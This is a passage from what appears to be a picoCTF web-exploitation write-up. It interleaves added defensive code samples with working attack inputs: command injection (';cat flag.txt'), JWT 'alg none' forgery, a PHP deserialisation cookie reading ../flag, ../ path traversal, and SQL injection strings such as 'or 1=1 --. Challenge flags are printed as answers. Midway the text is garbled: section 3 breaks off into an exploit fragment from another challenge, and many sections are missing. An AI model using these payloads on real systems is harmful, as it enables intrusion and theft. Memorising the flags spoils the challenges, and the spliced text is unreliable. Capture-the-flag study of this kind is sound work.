CTF-Web Exploitation (continuously updated)

码农世界 2024-05-13 Frontend

Table of Contents

  • 1. GET aHEAD
  • 2. Cookies
  • 3. Insp3ct0r
  • 4. Scavenger Hunt
  • 5. Bookmarklet
  • 6. where are the robots
  • 7. It is my Birthday
  • 8. logon
  • 9. dont-use-client-side
  • 10. picobrowser
  • 11. Client-side-again
  • 12. Java Code Analysis!?!
  • 13. Who are you
  • 14. Login
  • 15. JaWT Scratchpad
  • 16. Some Assembly Required 1
  • 17. More Cookies
  • 18. caas
  • 19. Some Assembly Required 2
  • 20. SQL Direct
  • 21. JAuth
  • 22. Includes
  • 23. Inspect HTML
  • 24. Local Authority
  • 25. Search source
  • 26. findme
  • 27. MatchTheRegex
  • 28. SOAP
  • 29. IntroToBurp
  • 30. Unminify
  • 31. Super Serial
  • 32. Most Cookies
  • 33. Forbidden Paths
  • 34. Power Cookie
  • 35. Roboto Sans
  • 36. Web Gauntlet
  • 37. Web Gauntlet 2
  • 38. Web Gauntlet 3
  • 39. Secrets
  • 40. SQLiLite
  • 41. More SQLi
  • 42. Trickster

    1. GET aHEAD

    Find the flag being held on this server to get ahead of the competition

    Hints

    Check out tools like Burpsuite to modify your requests and look at the responses

    The hint suggests that sending the request with a different HTTP method may produce the result.

    Capture the request to the page with Burp Suite.

    Change the request method from POST/GET to HEAD and resend it; the response contains the flag.

    The HEAD method asks for a response identical to a GET request, but without the response body.


    Burp Suite is an integrated platform for testing web applications that bundles many tools. It provides interfaces between these tools to speed up the process of attacking an application: all of them share one request framework and handle the corresponding HTTP messages, persistence, authentication, proxying, logging and alerting.

    In this challenge we use Proxy, an intercepting proxy server that sits as a man-in-the-middle between the browser and the target application and lets you intercept, inspect and modify the raw traffic in both directions.

    Repeater is used to manually resend individual HTTP requests and analyse the application's responses.

    2. Cookies

    Who doesn’t love cookies? Try to figure out the best one.

    Use the browser devTools to look at the cookies.

    There is a cookie whose value is -1.

    Change the cookie value from -1 to 1 and refresh the page; it now shows **I love chocolate chip cookies!**

    As the value is incremented the returned message keeps changing, up to value=18.

    Changing the value by hand is tedious, so a Python script can try every value in a range and, for any response that does not contain the string "I love", print it out to see what comes back.

    import requests

    url = "http://mercury.picoctf.net:29649/check"
    for i in range(0, 20):
        cookies = {"name": str(i)}
        r = requests.get(url, cookies=cookies)
        # The original picked the message out of the page by splitting on HTML
        # tags that were lost in extraction; checking the whole body keeps the logic.
        found = "I love" in r.text
        print("[+] Testing Cookie: {} | Result: {}".format(i, found))
        if not found:
            print(r.text)
            break

    3. Insp3ct0r

    Kishor Balan tipped us off that the following code may need inspection

    Hints

    How do you inspect web code on a browser?

    There's 3 parts

    Following the hint and inspecting the code, the flag is in the comments and consists of three parts.

    HTML part:

    "auth_name": guess})
                if "picoCTF{" in r.text:
                    print(f"Admin bit found in byte {position_idx} bit {bit_idx}.")
                    # The flag is between `` and ``.
                    print("Flag: " + r.text.split("")[1].split("")[0])
                    return
    exploit()
    

    18. caas

    Description

    Now presenting cowsay as a service

    The downloaded JS file shows that exec() is used to run the command, so there may be a command-injection problem.

    Following the hint, append `;ls` to the message in the URL; the output lists the directory, which shows that the command is executed.

    Appending `;cat flag.txt` yields the flag.

    19. Some Assembly Required 2

    Look at the wasm directly in devTools to obtain the XOR ciphertext.

    Decrypt it with an online tool to get the result.

    20. SQL Direct

    Description

    Connect to this PostgreSQL server and find the flag!

    Additional details will be available after launching your challenge instance.

    Hints

    What does a SQL database contain?

    Log in to PostgreSQL, query the database and get the flag.

    21. JAuth

    Description

    Most web application developers use third party components without testing their security. Some of the past affected companies are:

    • Equifax (a US credit bureau organization) - breach due to unpatched Apache Struts web framework CVE-2017-5638
    • Mossack Fonesca (Panama Papers law firm) breach - unpatched version of Drupal CMS used
    • VerticalScope (internet media company) - outdated version of vBulletin forum software used

      Can you identify the components and exploit the vulnerable one?

      Hints

      Use the web browser tools to check out the JWT cookie.

      The JWT should always have two (2) . separators.

      Log in as the user account to get the token, and decode it to see the payload.

      Test the web token for this JWT weakness.

      First disable security by setting “alg” to “none”, then set the role to “admin”, then omit the trailing signature while keeping the trailing period.

      Replace the cookie value with the new token and refresh to get the flag.
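Added example (not from the write-up or the challenge): a minimal JWT inspector and a verifier that pins the algorithm to HS256, showing why the tampered token described above (alg none, role admin, empty signature, trailing dot kept) is rejected when the server, not the token header, decides how a token is checked. The key and claims are constructed.

```python
import base64
import hashlib
import hmac
import json

def b64url_decode(part):
    """JWT segments are unpadded base64url; restore the padding before decoding."""
    return base64.urlsafe_b64decode(part + "=" * (-len(part) % 4))

def b64url_encode(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def inspect_jwt(token):
    """Decode header and payload WITHOUT trusting them (what the browser tools show you)."""
    header_b64, payload_b64, _sig = token.split(".")
    return {"header": json.loads(b64url_decode(header_b64)),
            "payload": json.loads(b64url_decode(payload_b64))}

def sign_hs256(payload, key):
    header_b64 = b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    payload_b64 = b64url_encode(json.dumps(payload).encode())
    sig = hmac.new(key, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    return f"{header_b64}.{payload_b64}.{b64url_encode(sig)}"

def verify_hs256(token, key):
    """Return the payload only for a genuine HS256 token under `key`, else None.

    The algorithm is pinned server-side; the 'alg' claimed in the header is never
    used to choose a verifier, so alg=none with an empty signature is refused.
    """
    parts = token.split(".")
    if len(parts) != 3:
        return None
    header_b64, payload_b64, sig_b64 = parts
    if json.loads(b64url_decode(header_b64)).get("alg") != "HS256":
        return None
    expected = hmac.new(key, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
        return None
    return json.loads(b64url_decode(payload_b64))

KEY = b"constructed-demo-key"  # constructed for this example, not the challenge's secret
USER_TOKEN = sign_hs256({"role": "user"}, KEY)
# The tampering the write-up describes: alg -> none, role -> admin, signature dropped, trailing dot kept.
FORGED_TOKEN = (b64url_encode(b'{"alg":"none","typ":"JWT"}') + "."
                + b64url_encode(b'{"role":"admin"}') + ".")
```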

      22. Includes

      Description

      Can you get the flag?

      Additional details will be available after launching your challenge instance.

      Hints

      Is there more code than what the inspector initially shows?

      23. Inspect HTML

      Description

      Can you get the flag?

      Additional details will be available after launching your challenge instance.

      Hints

      What is the web inspector in web browsers?

      24. Local Authority

      Description

      Can you get the flag?

      Additional details will be available after launching your challenge instance.

      Hints

      How is the password checked on this website?

      This challenge tests how the password is verified.

      First try logging in with arbitrary credentials.

      The JS shows the username and password in plaintext.

      Log in and view the flag.

      25. Search source

      Description

      The developer of this website mistakenly left an important artifact in the website source, can you find it?

      Hints

      How could you mirror the website on your local machine so you could use more powerful tools for searching?

      The description says the flag is in the site source; viewing the source in devTools, it is found in style.css.

      Alternatively, download the site source locally and search for the string picoCTF to find the flag.

      26. findme

      Description

      Help us test the form by submiting the username as test and password as test!The website

      Hints

      any redirections?

      Log in with the credentials given in the description. The hint mentions redirections, so keep devTools open while logging in and watch the redirects.

      Two redirect URLs show up:

      **Request URL:** http://saturn.picoctf.net:62931/next-page/id=cGljb0NURntwcm94aWVzX2Fs
      **Request URL:** http://saturn.picoctf.net:62931/next-page/id=bF90aGVfd2F5X2JlNzE2ZDhlfQ==
      

      Joining the two ids gives cGljb0NURntwcm94aWVzX2FsbF90aGVfd2F5X2JlNzE2ZDhlfQ==, which looks like base64; decoding it gives the flag.

      27. MatchTheRegex

      Description

      How about trying to match a regular expression

      Additional details will be available after launching your challenge instance.

      Hints

      Access the webpage and try to match the regular expression associated with the text field

      The hint points to regular-expression matching, so look at the source first.

      There is a comment that starts with p and ends with H; trying the flag prefix picoCTF and submitting shows the result.

      28. SOAP

      Description

      The web project was rushed and no security assessment was done. Can you read the /etc/passwd file?

      Hints

      XML external entity Injection

      The description says the site had no security assessment and asks us to read the /etc/passwd file; the hint points to XML injection.

      XXE, short for XML External Entity Injection, arises when an application parses XML input without forbidding the loading of external entities, so that malicious external files can be loaded; the consequences include file disclosure, command execution, internal port scanning, attacks on internal sites and denial of service. The trigger is usually a place where an XML document can be submitted without filtering, so an attacker can supply a malicious XML document.

      Clicking any button shows that the request body is XML.

      Capture the request with Burp Suite, rewrite the XML as follows and resend it to get the flag.
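Added example (not from the write-up): the parser-side mitigation, written against Python's stdlib expat binding, that refuses any DOCTYPE or entity declaration before an external entity could ever be resolved. The sample requests are constructed and the field names are assumed.

```python
import xml.parsers.expat as expat

class DtdNotAllowed(ValueError):
    """The document carries a DOCTYPE or entity declaration, which XXE depends on."""

def parse_without_dtd(data):
    """Parse a small flat XML request into {tag: text}, refusing any DTD.
    An external entity can only be declared inside a DOCTYPE, so rejecting the
    DOCTYPE itself (and never expanding parameter entities) closes the hole."""
    fields, path = {}, []
    def start_doctype(name, sysid, pubid, has_internal_subset):
        raise DtdNotAllowed("DOCTYPE declarations are not accepted")
    def entity_decl(*_args):
        raise DtdNotAllowed("entity declarations are not accepted")
    def start(tag, attrs):
        path.append(tag)
    def chars(text):
        if len(path) > 1 and text.strip():          # leaf text below the root element
            fields[path[-1]] = fields.get(path[-1], "") + text.strip()
    def end(tag):
        path.pop()

    parser = expat.ParserCreate()
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    parser.StartDoctypeDeclHandler = start_doctype
    parser.EntityDeclHandler = entity_decl
    parser.StartElementHandler = start
    parser.CharacterDataHandler = chars
    parser.EndElementHandler = end
    parser.Parse(data, True)       # an exception raised in a handler propagates out of Parse()
    return fields

def is_safe_request(data):
    """True when the request parses with no DTD, False when it was refused."""
    try:
        parse_without_dtd(data)
        return True
    except DtdNotAllowed:
        return False

# Constructed sample requests (field names assumed; not the challenge's real messages).
SAFE_REQUEST = b"<data><ID>1</ID><Name>alice</Name></data>"
XXE_REQUEST = (b'<?xml version="1.0"?>'
               b'<!DOCTYPE data [<!ENTITY ext SYSTEM "file:///constructed/path">]>'
               b"<data><ID>&ext;</ID></data>")
```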

      29. IntroToBurp

      Hints

      Try using burpsuite to intercept request to capture the flag.

      Try mangling the request, maybe their server-side code doesn't handle malformed requests very well.


      First fill in and submit the form to reach the OTP submission page.

      Intercept the request with Burp Suite.

      Following the hint we try modifying the OTP request parameter; changing the value achieves little, so try changing the parameter name instead.

      30. Unminify

      Description

      I don’t like scrolling down to read the code of my website, so I’ve squished it. As a bonus, my pages load faster!

      Hints

      Try CTRL+U / ⌘+U in your browser to view the page source. You can also add 'view-source:' before the URL, or try curl in your shell.

      Minification reduces the size of code, but does not change its functionality.

      What tools do developers use when working on a website? Many text editors and browsers include formatting.

      The page hints at Ctrl+U to view the page source; doing so reveals the flag directly.

      31. Super Serial

      Description

      Try to recover the flag stored on this website http://mercury.picoctf.net:2148/

      Hints

      The flag is at ../flag

      The hint says the flag is in a file named flag in the parent directory on the server, so it cannot be found under the web directory.

      robots.txt reveals an admin.phps, so we can read the PHP source of the pages (a .phps file is a PHP source file).

      First look at http://mercury.picoctf.net:2148/index.phps, which gives the following:

      There is an authentication.php page, which should be the permission-check page.

      if(isset($_POST["user"]) && isset($_POST["pass"])){
      	$con = new SQLite3("../users.db");
      	$username = $_POST["user"];
      	$password = $_POST["pass"];
      	$perm_res = new permissions($username, $password);
      	if ($perm_res->is_guest() || $perm_res->is_admin()) {
      		setcookie("login", urlencode(base64_encode(serialize($perm_res))), time() + (86400 * 30), "/");
      		header("Location: authentication.php");
      		die();
      	} else {
      		$msg = 'Invalid Login.';
      	}
      }

      Visiting http://mercury.picoctf.net:2148/authentication.phps for its source shows a cookie.php page:

      require_once("cookie.php");
      if(isset($perm) && $perm->is_admin()){
      	$msg = "Welcome admin";
      	$log = new access_log("access.log");
      	$log->append_to_log("Logged in at ".date("Y-m-d")."\n");
      } else {
      	$msg = "Welcome guest";
      }
      

      Continue to http://mercury.picoctf.net:2148/cookie.phps, which contains the following code:

      if(isset($_COOKIE["login"])){
      	try{
      		$perm = unserialize(base64_decode(urldecode($_COOKIE["login"])));
      		$g = $perm->is_guest();
      		$a = $perm->is_admin();
      	}
      	catch(Error $e){
      		die("Deserialization error. ".$perm);
      	}
      }
      

      The unserialize function deserialises the parameter named login.

      Try a PHP deserialisation attack:

      We store a serialised access_log object in the login cookie with log_file set to ../flag. The object is deserialised on the first line of the try block. However, the access_log class has no is_guest method, so $g = $perm->is_guest() fails and control jumps to the catch block. The catch block prints the value of $perm, which is the access_log object we injected. Printing $perm invokes the access_log object's __toString method, which prints the contents of the access_log.

      Build the access_log object: O:10:"access_log":1:{s:8:"log_file";s:7:"../flag";}

      base64-encode it: TzoxMDoiYWNjZXNzX2xvZyI6MTp7czo4OiJsb2dfZmlsZSI7czo3OiIuLi9mbGFnIjt9

      Add a login cookie with this value to the request for authentication.php to get the flag.
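Added example (not from the write-up or the challenge code): a small parser for the PHP serialize() format that decodes the login cookie the way cookie.php does and reports the object's class, so an unexpected class such as access_log is visible before anything is unserialized; the durable fix is to never unserialize() untrusted input, or at least to restrict it with the allowed_classes option. The write-up's cookie is used as-is; the permissions property names are assumed.

```python
import base64
import urllib.parse

def _parse(data, pos):
    """Parse one PHP serialize() value (i, s, a, O) starting at pos; returns (value, next pos).
    Objects become {"__class__": name, "props": {...}}; lengths are treated as ASCII byte counts."""
    tag = data[pos]
    if tag == "i":                                   # i:18;
        end = data.index(";", pos)
        return int(data[pos + 2:end]), end + 1
    if tag == "s":                                   # s:7:"../flag";
        colon = data.index(":", pos + 2)
        length = int(data[pos + 2:colon])
        start = colon + 2                            # skip :"
        return data[start:start + length], start + length + 2   # skip ";
    if tag in "aO":
        if tag == "O":                               # O:10:"access_log":1:{...}
            colon = data.index(":", pos + 2)
            name_len = int(data[pos + 2:colon])
            name = data[colon + 2:colon + 2 + name_len]
            pos = colon + 2 + name_len + 2           # skip ":
        else:                                        # a:2:{...}
            pos += 2
        brace = data.index(":", pos)
        count = int(data[pos:brace])
        pos = brace + 2                              # skip :{
        items = {}
        for _ in range(count):
            key, pos = _parse(data, pos)
            value, pos = _parse(data, pos)
            items[key] = value
        pos += 1                                     # skip }
        return ({"__class__": name, "props": items} if tag == "O" else items), pos
    raise ValueError(f"unsupported type tag {tag!r} at offset {pos}")

def inspect_login_cookie(cookie_value, allowed_classes=("permissions",)):
    """Decode the cookie exactly as cookie.php does (urldecode -> base64 -> unserialize)
    and report the object's class and whether it is one the application expects."""
    raw = base64.b64decode(urllib.parse.unquote(cookie_value)).decode("latin-1")
    obj, end = _parse(raw, 0)
    if end != len(raw):
        raise ValueError("trailing data after the serialized value")
    cls = obj.get("__class__") if isinstance(obj, dict) else None
    return {"class": cls, "allowed": cls in allowed_classes, "object": obj}

# The write-up's cookie (access_log, log_file = ../flag) and a constructed permissions object (property names assumed).
WRITEUP_COOKIE = "TzoxMDoiYWNjZXNzX2xvZyI6MTp7czo4OiJsb2dfZmlsZSI7czo3OiIuLi9mbGFnIjt9"
GUEST_COOKIE = base64.b64encode(b'O:11:"permissions":2:{s:8:"username";s:5:"guest";s:8:"password";s:5:"guest";}').decode()
```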

      32. Most Cookies

      picoCTF-Web Exploitation-Most Cookies

      33. Forbidden Paths

      Description

      Can you get the flag?We know that the website files live in /usr/share/nginx/html/ and the flag is at /flag.txt but the website is filtering absolute file paths. Can you get past the filter to read the flag?

      From the description we know the website files live under /usr/share/nginx/html/ and flag.txt is in the root directory /.

      Try ../../../../../flag.txt to climb to the root directory; this yields the flag directly.
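Added example (not from the write-up): the absolute-path check the description implies, beside a resolver that normalises the requested path under the web root and refuses anything that ends up outside it, which is what stops the ../ chain used above. The paths come from the challenge description; the filter's exact implementation is not on the page and is modelled here.

```python
import posixpath

WEB_ROOT = "/usr/share/nginx/html"   # from the challenge description

def blocked_by_absolute_filter(user_path):
    """The check the description implies: only absolute paths are refused.
    A relative path made of ../ segments passes straight through."""
    return user_path.startswith("/")

def resolve_under_root(user_path, root=WEB_ROOT):
    """Join the requested path onto the web root, normalise it lexically and
    return it only if the result still lies inside root; otherwise return None.
    (On a real server also realpath() the result so symlinks cannot escape.)"""
    candidate = posixpath.normpath(posixpath.join(root, user_path))
    if candidate == root or candidate.startswith(root + "/"):
        return candidate
    return None
```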

      34. Power Cookie

      Description

      Can you get the flag?

      Hints

      Do you know how to modify cookies?

      Another cookie-modification challenge: click the button first and inspect the cookies.

      isAdmin is 0; change it to 1 and refresh to get the flag directly.

      35. Roboto Sans

      Description

      The flag is somewhere on this web application not necessarily on the website. Find it.

      Given the title, try robots.txt; visiting it directly gives:

      User-agent *
      Disallow: /cgi-bin/
      Think you have seen your flag or want to keep looking.
      ZmxhZzEudHh0;anMvbXlmaW
      anMvbXlmaWxlLnR4dA==
      svssshjweuiwl;oiho.bsvdaslejg
      Disallow: /wp-admin/
      

      It says a flag clue can be found here, and below it are two encoded strings; try base64-decoding them:

      ZmxhZzEudHh0;anMvbXlmaW  -- flag1.txtjs/myfi
      anMvbXlmaWxlLnR4dA==     -- js/myfile.txt
      

      Try both flag1.txt and js/myfile.txt: flag1.txt returns 404, js/myfile.txt gives the result.

      36. Web Gauntlet

      picoCTF-Web Exploitation-Web Gauntlet

      37. Web Gauntlet 2

      Description

      This website looks familiar… Log in as admin

      Site: http://mercury.picoctf.net:65261/

      Filter: http://mercury.picoctf.net:65261/filter.php

      Hints

      I tried to make it a little bit less contrived since the mini competition.

      Each filter is separated by a space. Spaces are not filtered.

      There is only 1 round this time, when you beat it the flag will be in filter.php.

      There is a length component now.

      sqlite

      Filters: or and true false union like = > < ; -- /* */ admin

      The keywords that worked in the previous level are all blocked in this one.

      admin is filtered, so we keep using ad'||'min

      SELECT username, password FROM users WHERE username='ad'||'min' AND password='1'
      

      That leaves only the password to match; to match any password, use ' glob '*

      The resulting SQL is:

      SELECT username, password FROM users WHERE username='ad'||'min' AND password='' glob '*'
      

      Refresh filter.php to get the flag:

      
      <?php
      session_start();

      if (!isset($_SESSION["winner2"])) {
          $_SESSION["winner2"] = 0;
      }
      $win = $_SESSION["winner2"];
      $view = ($_SERVER["PHP_SELF"] == "/filter.php");
      if ($win === 0) {
          $filter = array("or", "and", "true", "false", "union", "like", "=", ">", "<", ";", "--", "/*", "*/", "admin");
          if ($view) {
              echo "Filters: ".implode(" ", $filter);
          }
      } else if ($win === 1) {
          if ($view) {
              highlight_file("filter.php");
          }
          $_SESSION["winner2"] = 0; // <- Don't refresh!
      } else {
          $_SESSION["winner2"] = 0;
      }
      // picoCTF{0n3_m0r3_t1m3_e2db86ae880862ad471aa4c93343b2bf}
      ?>

      38. Web Gauntlet 3

      Description

      Last time, I promise! Only 25 characters this time. Log in as admin Site: http://mercury.picoctf.net:8650/

      Filter: http://mercury.picoctf.net:8650/filter.php

      Look at **filter.php**:

      Filters: or and true false union like = > < ; -- /* */ admin

      This is the same as the previous level, so try the previous level's username and password; it reports success, and refreshing filter.php gives the result:

      
      <?php
      session_start();

      if (!isset($_SESSION["winner3"])) {
          $_SESSION["winner3"] = 0;
      }
      $win = $_SESSION["winner3"];
      $view = ($_SERVER["PHP_SELF"] == "/filter.php");
      if ($win === 0) {
          $filter = array("or", "and", "true", "false", "union", "like", "=", ">", "<", ";", "--", "/*", "*/", "admin");
          if ($view) {
              echo "Filters: ".implode(" ", $filter);
          }
      } else if ($win === 1) {
          if ($view) {
              highlight_file("filter.php");
          }
          $_SESSION["winner3"] = 0; // <- Don't refresh!
      } else {
          $_SESSION["winner3"] = 0;
      }
      // picoCTF{k3ep_1t_sh0rt_6fdd78c92c7f26a10acd3ece176dea4d}
      ?>

      39. Secrets

      Description

      We have several pages hidden. Can you find the one with the flag?The website is running here.

      Hints

      folders folders folders

      The hint suggests there are three folders; the page source reveals a secret directory.

      [page source, tags stripped: a "home" link and the text "If security wasn't your job, would you do it as a hobby?"]

      访问http://saturn.picoctf.net:55637/secret/

      It says we are on the right track; keep reading the source and a hidden directory turns up.

      [page source, tags stripped: "Finally. You almost found me. you are doing well"]

      Visit http://saturn.picoctf.net:55637/secret/hidden/ and find a superhidden directory.

      [page source, tags stripped: a LOGIN form]

      Visit http://saturn.picoctf.net:55637/secret/hidden/superhidden/ and view the source to find the flag.

      [page source, tags stripped: "Finally. You found me. But can you see me"]

      picoCTF{succ3ss_@h3n1c@10n_790d2615}

      40. SQLiLite

      Description

      Can you login to this website?

      Hints

      'admin' is the user you want to login as.

      Log in as admin with an arbitrary password; the page shows the SQL statement it ran:

      username: admin
      password: 123
      SQL query: SELECT * FROM users WHERE name='admin' AND password='123'
      

      Try the password 'or 1=1 -- , which builds the SQL:

      -- username: admin
      -- password:  'or 1=1 -- 
      SELECT * FROM users WHERE name='admin' AND password=''or 1=1 -- '
      

      View the page source to get the flag.
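Added example (not from the write-up) serving both the Web Gauntlet 2 and SQLiLite sections: the two inputs the write-up constructs, run against a string-built query and against a parameterised one over a constructed in-memory SQLite table, plus a check against the Web Gauntlet 2 blocklist to show why a blocklist does not help. Table rows and the admin secret are constructed.

```python
import sqlite3

def make_db():
    """In-memory stand-in for the challenges' users table (constructed rows)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?)",
                    [("admin", "constructed-secret"), ("guest", "guest")])
    return con

def login_concat(con, username, password):
    """Vulnerable pattern: user input spliced into the SQL text, as in both challenges."""
    sql = (f"SELECT username, password FROM users "
           f"WHERE username='{username}' AND password='{password}'")
    return con.execute(sql).fetchall()

def login_param(con, username, password):
    """Fix: the statement is fixed and the values are bound, so they are never parsed as SQL."""
    sql = "SELECT username, password FROM users WHERE username=? AND password=?"
    return con.execute(sql, (username, password)).fetchall()

# Web Gauntlet 2's blocklist (from filter.php) and a case-insensitive check against it.
FILTER = ["or", "and", "true", "false", "union", "like", "=", ">", "<", ";", "--", "/*", "*/", "admin"]

def is_filtered(value):
    low = value.lower()
    return any(word in low for word in FILTER)

# The two inputs the write-up uses: Web Gauntlet 2 (concatenation + glob) and SQLiLite (comment).
GAUNTLET2 = ("ad'||'min", "' glob '*")
SQLILITE = ("admin", "'or 1=1 -- ")

def demo():
    con = make_db()
    return {
        "gauntlet2_passes_filter": not any(is_filtered(v) for v in GAUNTLET2),
        "gauntlet2_concat": login_concat(con, *GAUNTLET2),   # admin row, password never checked
        "gauntlet2_param": login_param(con, *GAUNTLET2),     # no such user, no rows
        "sqlilite_concat": login_concat(con, *SQLILITE),     # OR 1=1 returns every row
        "sqlilite_param": login_param(con, *SQLILITE),       # literal password, no rows
    }
```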

      41. More SQLi

      picoCTF-Web Exploitation-More SQLi

      42. Trickster

      picoCTF-Web Exploitation-Trickster
